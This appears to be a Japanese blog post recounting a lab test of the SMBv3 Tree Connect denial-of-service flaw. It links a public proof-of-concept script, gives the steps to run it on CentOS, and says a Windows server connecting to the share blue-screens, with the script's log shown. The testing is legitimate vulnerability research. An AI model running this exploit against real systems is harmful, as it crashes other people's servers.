SMB v3の脆弱性について検証してみた

  • 1
    Like
  • 0
    Comment

以下URL

https://jvn.jp/vu/JVNVU95841181/

ざっくり言うと攻撃コードを仕込んだSMBサーバにWindows8.1/10系OSから共有アクセスするとDos攻撃を行う脆弱性とのことのようです。

攻撃コードが公開されていたためテスト環境で実行したところ簡単にできました。
(ご利用は自己責任で)

GitHubで攻撃コードが公開されているのでダウンロードします。
https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect

Win10.py
odict.py

上記二つのファイルをCentosにアップロードします。(CentOS6.2を使用しました)
Win10.pyに実行権限(chmod 755)つけて実行します。(odict.pyもWin10.pyと同じ場所に格納)

 python Win10.py

Windows2012R2サーバでWin10.pyを実行しているサーバに共有アクセスします。

¥¥[Win10.pyを実行しているサーバのIPアドレス]

003.png

ブルースクリーンなります。:(

002.png

Windows7でもやってみましたが特に影響なかったので記事の通り

Windows8.1/10/2012/2016(SMB v3)が対象ですね。
実行ログだとSMB v2となっていますがどうなんでしょうね。

# python Win10.py
From: ('192.168.***.***', 49161)
[*]Negotiating SMBv2.
[*]Negotiate Protocol SMBv2 packet sent.
[*]Session challenge SMBv2 packet sent.
From: ('192.168.***.***', 49162)
[*]Negotiate Protocol SMBv2 packet sent.
[*]Session challenge SMBv2 packet sent.
[*]Triggering Bug; Tree Connect SMBv2 packet sent.
Disconnected from ('192.168.***.***', 49162)

ファイルサーバ乗っ取られてこの脆弱性使われた日には大変なことになりそうです・・・。